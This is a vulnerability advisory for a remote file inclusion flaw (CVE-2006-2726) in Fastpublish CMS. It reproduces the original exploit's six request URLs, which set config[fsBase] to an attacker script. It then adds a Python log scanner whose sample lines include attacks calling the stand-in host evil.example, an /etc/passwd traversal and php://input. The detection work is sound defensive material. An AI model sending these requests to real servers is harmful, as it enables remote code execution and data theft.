Fastpublish CMS Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1110354    Vulnerability type: Input validation
Published: 2006-05-29    Updated: 2006-06-01
CVE: CVE-2006-2726    CNNVD ID: CNNVD-200606-031
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/1848
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-031
|Vulnerability Details
Fastpublish CMS 1.6.9.d contains PHP remote file inclusion vulnerabilities. A remote, unauthenticated attacker can include arbitrary files by supplying the config[fsBase] parameter to (1) drucken.php, (2) drucken2.php, (3) email_an_benutzer.php, (4) rechnung.php, (5) suche/search.php and (6) adminbereich/admin.php. The parameter name mirrors the $config['fsBase'] base-path entry that these scripts prepend to the files they include; the usual mechanism for this class of bug is that a request can overwrite that array entry before the include runs (PHP's register_globals behaviour), so the include resolves to an attacker-chosen URL or local path and any PHP fetched from it executes with the web server's privileges. No authentication is needed for any of the six entry points, which is consistent with the 7.5 CVSS score.
|Exploit
################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities
# Script site: http://www.fastpublish.org
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################

http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-29]
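The details section above explains the bug as an attacker-supplied config[fsBase] value reaching an include(), and the exploit block lists the six request shapes that trigger it. The following is an added example for this page, written here as a detection aid; it is not Fastpublish code and not part of the original exploit. It parses combined-format Apache/Nginx access log lines (an assumption about the log format), URL-decodes each request target, and reports any request that overrides config[fsBase] against one of the six listed scripts, classifying the value as a remote URL, a PHP stream wrapper, a local path traversal, or merely suspicious. The script names come from the advisory; the log lines, hostnames and IP addresses are constructed for the demo.

```python
"""Flag CVE-2006-2726 exploitation attempts in combined-format access logs.

Added example for this advisory; it is not Fastpublish code and not part of
the original exploit. Script names come from the advisory; the log lines
below are constructed for the demo.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The six scripts the advisory lists, relative to the Fastpublish install path.
VULNERABLE_SCRIPTS = (
    "drucken.php",
    "drucken2.php",
    "email_an_benutzer.php",
    "rechnung.php",
    "suche/search.php",
    "adminbereich/admin.php",
)

# Apache/Nginx combined format (assumed): ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")
# PHP stream wrappers that also let include() read attacker-controlled data.
PHP_WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://", "compress.")


def classify_fsbase(value):
    """Say what kind of include an attacker-supplied fsBase value would cause."""
    v = unquote(value).strip().lower()  # second decode catches double-encoding
    if v.startswith(REMOTE_SCHEMES):
        return "remote-url"
    if v.startswith(PHP_WRAPPERS):
        return "php-wrapper"
    if "../" in v or "..\\" in v or v.startswith("/") or "\x00" in v:
        return "local-path"
    # fsBase is never a legitimate request parameter, so any override is notable.
    return "suspicious"


def analyze_request(target):
    """Return a dict describing a config[fsBase] override in a request target,
    or None when the request does not touch that parameter."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    script = next((s for s in VULNERABLE_SCRIPTS if path.endswith("/" + s)), None)
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decodes config%5BfsBase%5D to config[fsBase];
        # PHP maps only the exact key name onto $config['fsBase'].
        if key == "config[fsBase]":
            return {"script": script, "value": value, "category": classify_fsbase(value)}
    return None


def scan_log(lines):
    """Return one hit per log line whose request overrides config[fsBase]."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = analyze_request(m["target"])
        if hit is not None:
            hits.append({"ip": m["ip"], "time": m["time"], "status": m["status"], **hit})
    return hits


# Constructed sample lines (RFC 5737 documentation addresses, fictitious hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [29/May/2006:10:12:01 +0200] "GET /fastpublish/drucken.php?config[fsBase]=http://evil.example/shell.txt? HTTP/1.1" 200 1532 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [29/May/2006:10:12:09 +0200] "GET /fastpublish/drucken.php?id=42 HTTP/1.1" 200 8804 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [29/May/2006:10:13:44 +0200] "GET /cms/suche/search.php?config%5BfsBase%5D=ftp%3A%2F%2Fevil.example%2Finc HTTP/1.0" 500 0 "-" "curl/7.15"',
    '198.51.100.7 - - [29/May/2006:10:14:02 +0200] "GET /cms/adminbereich/admin.php?config[fsBase]=../../../../etc/passwd%00 HTTP/1.0" 200 2210 "-" "curl/7.15"',
    '192.0.2.19 - - [29/May/2006:11:02:37 +0200] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.19 - - [29/May/2006:11:03:10 +0200] "POST /cms/rechnung.php?config[fsBase]=php://input HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ip"]} {h["time"]} {h["script"] or "(other script)"} '
              f'{h["category"]} status={h["status"]} fsBase={h["value"]!r}')
```

Two caveats when using this against real logs. Access logs record only the query string, and register_globals imports POST bodies and cookies as well, so an attacker who sends config[fsBase] in a POST body or a Cookie header leaves no trace here; pair the check with PHP-level or WAF logging of request bodies. A 200 on the first hit with a small byte count, or a 500 on the ftp:// attempt, is only a hint about whether the include succeeded, not proof. The durable fix is at the PHP layer (register_globals off, allow_url_fopen and, on PHP 5.2 and later, allow_url_include off) together with an updated Fastpublish release; the advisory itself names no patched version.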
|References

VUPEN ADV-2006-2043: http://www.frsirt.com/english/advisories/2006/2043
SECUNIA 20346: http://secunia.com/advisories/20346
MILW0RM 1848: http://milw0rm.com/exploits/1848
XF fastpublish-fsbase-file-include(26897): http://xforce.iss.net/xforce/xfdb/26897
BID 18163: http://www.securityfocus.com/bid/18163
OSVDB 26162: http://www.osvdb.org/26162
OSVDB 26161: http://www.osvdb.org/26161
OSVDB 26160: http://www.osvdb.org/26160
OSVDB 26159: http://www.osvdb.org/26159
OSVDB 26158: http://www.osvdb.org/26158
OSVDB 26157: http://www.osvdb.org/26157